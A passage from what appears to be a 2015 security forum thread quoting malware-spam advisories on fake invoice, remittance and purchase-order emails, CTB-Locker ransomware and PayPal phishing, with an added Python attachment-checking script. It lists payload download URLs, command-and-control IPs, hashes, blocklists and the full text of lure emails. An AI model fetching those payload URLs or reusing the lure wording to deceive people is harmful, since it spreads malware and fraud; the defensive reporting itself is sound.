The domain directxex .net [Google Safebrowsing***] has an unsavoury reputation, and although it is currently hiding behind a Cloudflare IP, it actually appears to be hosted on an OVH France IP of 5.135.127.68. I definitely recommend that you -block- traffic to directxex .net."
* https://www.virustotal.com/en/file/a3a794d582a3f006981ed7c02ec540cf4b21e53bf2d7cb9fb8154a78da4b7228/analysis/1423764503/

** https://www.virustotal.com/en/file/754044eb9a2a2cc5bfbb1e955a9ef7e94c694cfde4ab59ea8e55ea68d106affb/analysis/1423765263/

*** https://www.google.com/safebrowsing/diagnostic?site=directxex.net
"... listed for suspicious activity 122 time(s) over the past 90 days..."

> https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-0158 - 9.3 (HIGH)
___

Fake 'INVOICE' SPAM - malware
- http://blog.dynamoo.com/2015/02/malware-spam-minuteman-press-west-loop.html
12 Feb 2015 - "This -fake- invoice comes with a malicious attachment. It does not come from Minuteman Press, their systems have not been compromised in any way. Instead this is a simple email -forgery-.
From: Minuteman Press West Loop [westloop@ minutemanpress .com]
Reply-To: westloop@ minutemanpress .com
Date: 12 February 2015 at 09:00
Subject: INVOICE 1398 - FEB 4 2015
(Please see attached file: INVOICE 1398 - FEB 4 2015.DOC)
Thank you for your business.
Julio Lopez | Design Manager | Minuteman Press West Loop
1326 W. Washington Blvd. | Chicago, IL 60607
p 312.291.8966 | f 312.929.2472 |

I have seen just a single sample with an attachment INVOICE 1398 - FEB 4 2015.doc, although usually there are two or more variants so you may see slightly different ones. The DOC file has a VirusTotal detection rate of 0/57* and contains this malicious macro which downloads a second component from:
http ://ecinteriordesign .com/js/bin.exe
This is then saved as %TEMP%\IHJfffFF.exe and has a detection rate of 7/57**. Automated analysis tools... show attempted connections to:
37.139.47.105
78.140.164.160
41.56.49.36
104.232.34.68
210.181.222.118
The Malwr report shows that it drops a DLL with an MD5 of 9001023d93beccd6c28ba67cbbc10cec which had a low detection rate at VT when it was checked a couple of hours ago***."
* https://www.virustotal.com/en/file/01cb3eedc33553959d548134caf0552662bbb3cdb3cc4c94dd037a6f9aa577a4/analysis/1423734590/

** https://www.virustotal.com/en/file/a42dc7abd83b0e329b846ea280c02812454acb5b98902adda8cfc786866fac5d/analysis/1423734603/

*** https://www.virustotal.com/en/file/50f6ae0daf2b2e5b2a4822d859fd3d503d9efa29871ecb286480fc8c4ffdd7c7/analysis/
___

CTB-Locker Ransomware Spoofs Chrome and Facebook Emails as Lures, Linked to Phishing
- http://blog.trendmicro.com/trendlabs-security-intelligence/ctb-locker-ransomware-spoofs-chrome-and-facebook-emails-as-lures-linked-to-phishing/
Feb 12, 2015 - "... We are seeing another wave of CTB-Locker -ransomware- making their way into the wild. What’s highly notable about this current batch of crypto-ransomware is that they are using “big names” like Facebook and Google Chrome as social engineering lures.
The New Lures: We observed that the CTB-Locker ransomware arrives through spammed emails pretending to be from Google Chrome and Facebook. The -fake- Google Chrome email pretends to be a notification about updating the recipient’s Chrome browser. Upon clicking-the-link, the user will be directed to a site hosting the malware. The malware uses a Google Chrome -icon- to disguise itself as a legitimate installer package. This is actually a variant detected as TROJ_CRYPCTB.YUX.
Fake Google Chrome email:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2015/02/CTB-L-1.png
Another lure used by cybercriminals is Facebook. The email arrives as an account suspension notification. The email instructs the user to click on an embedded link. This link will lead to the download of the malware:
Fake Facebook email:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2015/02/CTB-L-2.png
The malware uses a .PDF icon to disguise itself as a legitimate file. This malware is detected as TROJ_CRYPCTB.NSA. Our findings show that -both- variants are hosted in -compromised- sites. And interestingly enough, each variant is hosted on a group of compromised sites that is linked to one IP address. Connections to Phishing: Digging deeper into these compromised sites, we discovered that some of these URLs are associated with phishing spam, specifically those using -PayPal- as their lure.
Fake PayPal email:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2015/02/CTB-L-3.png
The spammed email arrives with the subject, “Take Action PayPal.” The email instructs the recipient to log in to their PayPal account to settle an issue by clicking-a-link in the email. Upon clicking, the link redirects to a phishing site. The site asks not only for the user’s login credentials, but other important, sensitive information like contact details and credit card information.
Fake PayPal site:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2015/02/CTB-L-4.png
Information requested by the phishing site:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2015/02/CTB-L-5.png
Once the user completes all the information, the site then redirects the person to the legitimate PayPal login page. To avoid suspicion, it uses the excuse of needing to log in -again- for the changes to fully reflect in the PayPal account. Using the same URLs as those of the CTB-Locker malware suggests that the threat actors distributing the ransomware are also dabbling in phishing... CTB-Locker variants included language support for four languages: English, German, Italian, and Dutch. This new batch of ransomware now supports seven languages, namely, French, Spanish, Latvian, German, Dutch, Italian, and English.
Ransom message:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2015/02/CTB-L-6.png
... The malware also now arrives in a Windows installer package. The two new variants identified were wrapped in an installer using NSIS. Cybercriminals leverage NSIS, which is an open source installer like InstallShield, to make analysis difficult. When executed, the malware drops an encrypted version of the CRYPCTB malware and a library (.DLL) file. The library file will decrypt and execute the ransomware. After the routine, the library file will delete itself. In a surprising move, the cybercriminals adjusted the ransom payment for the decryption of files to 2 BTC, a fee lower than the 3 BTC ransom fee of previous variants. The malware also uses new set of Tor Addresses to communicate with the affected system... the added languages are all for countries based in Europe. This suggests that these variants may be targeting the EMEA region...
Top countries affected by CRYPCTB malware family:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2015/02/CTB-L-72.jpg
... Conclusion: From what we’ve seen, the threat actors focused more on improving their chances of spreading the malware than improving the design of the code itself. Once the malware is in the system, it can be very challenging to recover the files without getting their help. As we have mentioned in previous entries, it might be tempting to give in and pay the ransom fee to get back encrypted files. However, there is no guarantee that the cybercriminals will actually honor the exchange. At the very worst, the victim is left with no files and no money..."

:fear: :mad:
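Several of the posts in this thread describe the same handful of attachment tricks: an .exe or .scr carrying a PDF icon (the CashPro, Lloyds and Amazon runs), a .js dropper inside a zip (the FedEx run), a filename padded with spaces so the real extension scrolls out of view (the Megtrade 7z), and an RTF exploit for CVE-2012-0158 renamed to .doc (the "invoice :reminder" run). The check below is an added example for this thread, not code from any of the blogs quoted; it runs offline over a constructed zip that mimics those attachments, identifies each member by its leading bytes rather than its name, and lists why it should be quarantined. The filenames inside the sample archive are borrowed from the posts but the byte contents are made up. It handles zip only; the 7z case in the Megtrade post would need a third-party library, and macro detection inside genuine OLE .doc files (the Dridex runs) is out of scope here.

```python
"""Flag mail attachments whose content does not match the name they present
(PDF-icon .exe/.scr, .js in a zip, padded names, RTF renamed .doc). Added
example for this thread; not code from the blogs quoted here."""
import io
import os
import re
import zipfile

# Extensions Windows will run on double-click (not exhaustive).
EXEC_EXTS = {".exe", ".scr", ".pif", ".com", ".cpl", ".bat", ".cmd",
             ".js", ".jse", ".vbs", ".vbe", ".wsf", ".hta", ".jar"}
# Document extensions used as a lure when stacked before the real one.
LURE_EXTS = {".pdf", ".doc", ".docx", ".xls", ".txt", ".jpg"}
# What each document extension should really contain.
EXPECTED = {".doc": {"ole", "zip"}, ".docx": {"zip"}, ".xls": {"ole", "zip"},
            ".pdf": {"pdf"}}
# Leading bytes -> real format.
MAGIC = [
    (b"MZ", "pe"),                                 # Windows PE executable
    (b"%PDF-", "pdf"),
    (b"{\\rtf", "rtf"),
    (b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1", "ole"),  # legacy .doc/.xls container
    (b"PK\x03\x04", "zip"),                        # zip, also .docx/.jar
]
PADDING = re.compile(r"\s{5,}")   # long whitespace runs push the extension out of view


def sniff(data):
    """Identify the real format from its leading bytes."""
    for sig, kind in MAGIC:
        if data.startswith(sig):
            return kind
    return "unknown"


def split_exts(name):
    """'a.pdf.exe' -> ('.exe', ['.pdf']); 'a.scr' -> ('.scr', [])."""
    parts = os.path.basename(name).lower().split(".")
    if len(parts) < 2:
        return "", []
    return "." + parts[-1], ["." + p for p in parts[1:-1]]


def classify(name, data):
    """Return the reasons to quarantine this attachment; empty list means clean."""
    final, inner = split_exts(name)
    kind = sniff(data)
    reasons = []
    if final in EXEC_EXTS:
        reasons.append("executable extension " + final)
    if kind == "pe":
        reasons.append("PE executable content")
    for lure in inner:
        if lure in LURE_EXTS:
            reasons.append("lure extension " + lure + " stacked before " + final)
    if PADDING.search(os.path.basename(name)):
        reasons.append("whitespace padding hides real extension")
    if final in EXPECTED and kind not in EXPECTED[final]:
        reasons.append("content is " + kind + ", not a " + final + " container")
    return reasons


def inspect_zip(zip_bytes, depth=0):
    """Classify every file in a zip, descending one level into nested zips."""
    findings = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            data = zf.read(info)
            findings[info.filename] = classify(info.filename, data)
            if depth < 1 and sniff(data) == "zip" and split_exts(info.filename)[0] == ".zip":
                for inner_name, rs in inspect_zip(data, depth + 1).items():
                    findings[info.filename + "/" + inner_name] = rs
    return findings


def build_sample_zip():
    """Constructed archive mimicking the attachments described in the posts."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("ImportantMessage.scr", b"MZ" + b"\x90" * 62)           # PDF-icon .scr
        zf.writestr("order_report.pdf.exe", b"MZ" + b"\x00" * 62)           # double extension
        zf.writestr("FedEx_0000220741.js", b"var s='';eval(s);")            # script dropper
        zf.writestr("Purchase Order Copy.pdf                 Adobe Reader.exe",
                    b"MZ" + b"\x00" * 62)                                   # padded name
        zf.writestr("INVOICE.doc", b"{\\rtf1\\ansi\\deff0 {\\fonttbl}}")   # RTF posing as .doc
        zf.writestr("receipt.pdf", b"%PDF-1.4\n%%EOF\n")                     # benign
    return buf.getvalue()


def build_nested_zip():
    """Constructed zip-in-zip, as some runs wrap the payload twice."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("docs-20276.zip", build_sample_zip())
    return buf.getvalue()


if __name__ == "__main__":
    for fname, reasons in inspect_zip(build_nested_zip()).items():
        print(fname, "->", "; ".join(reasons) or "clean")
```

The point of sniffing the magic bytes is that the icon and the displayed name are both attacker-controlled, while the first bytes of the file are what Windows actually acts on: an MZ header is a program whatever the name says, and an RTF header in a .doc is exactly the mismatch the CVE-2012-0158 post describes. A mail gateway that only matches extensions misses the padded and renamed cases.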

AplusWebMaster
2015-02-13, 17:49
FYI...

Fake 'Remittance' SPAM - malware
- http://blog.dynamoo.com/2015/02/malware-spam-remittance-xx12345678.html
13 Feb 2015 - "This -spam- comes from randomly-named companies, with slightly different body text and different subject in each case. Here is an example:
From: Gale Barlow
Date: 13 February 2015 at 12:30
Subject: Remittance IN56583285
Dear Sir/Madam,
I hope you are OK. I am writing you to let you know that total amount specified in the contract has been paid into your bank account on the 12th of February at 15:25 via BACS payment system and should reach the destination (beneficiary's) account within 3 working days.
To see full payment details please refer to the remittance advice note attached to the letter.
Any queries? Please reply back with your questions and you will receive a prompt and qualitative response as soon as possible. Please do not hesitate to write us.
Gale Barlow
Accounts Manager
4D PHARMA PLC
Boyd Huffman
Accounts Payable
GETECH GROUP

There is a malicious Word document attached to the email, so far I have only seen one version of this but usually there are two or more. The document itself has a low detection rate of 1/57* and it contains a malicious macro which downloads a file from the following location:
http ://62.76.188.221 /aksjdderwd/asdbwk/dhoei.exe
This is saved as %TEMP%\dsHHH.exe and has a detection rate of 7/57**, identified as a Dridex downloader. Automated analysis tools... show a variety of activities, including communications with the following IPs:
85.143.166.72 (Pirix, Russia)
46.19.143.151 (Private Layer, Switzerland)
193.206.162.92 (Universita degli Studi dell'Insubria, Italy)
92.63.88.87 (MWTV, Latvia)
78.129.153.18 (iomart, UK)
205.185.119.159 (Frantech Solutions, US)
The malware then drops a Dridex DLL with a detection rate of 3/52*** and mysteriously drops another Dridex downloader with a detection rate of 6/57****. The Malwr report for that indicates there is some attempted traffic to nonexistent domains.
Recommended blocklist:
85.143.166.72
46.19.143.151
193.206.162.92
92.63.88.87
78.129.153.18
205.185.119.159 "
* https://www.virustotal.com/en/file/84ef5406a61b4fb0703768a120e9f107d569387276357d88ef77c936c1ec109a/analysis/1423835743/

** https://www.virustotal.com/en/file/2ad9b362775fe8a5a70ea4707325699123480e2827abdd2893ff566b80e86ea8/analysis/1423835772/

*** https://www.virustotal.com/en/file/c6d838b4f4635bdc23f12cb0961cbf2ed7d8358eb7259c71946aa2d3cdd816cf/analysis/1423836506/

**** https://www.virustotal.com/en/file/03a7986ae0b058e1471c549ea18dfe76a6ab162d7f696509a7f57e2abbafbdef/analysis/1423836488/
___

Fake 'PURCHASE ORDER' SPAM - doc malware
- http://myonlinesecurity.co.uk/alison-longworth-universal-sealants-uk-limited-purchase-order-34663-word-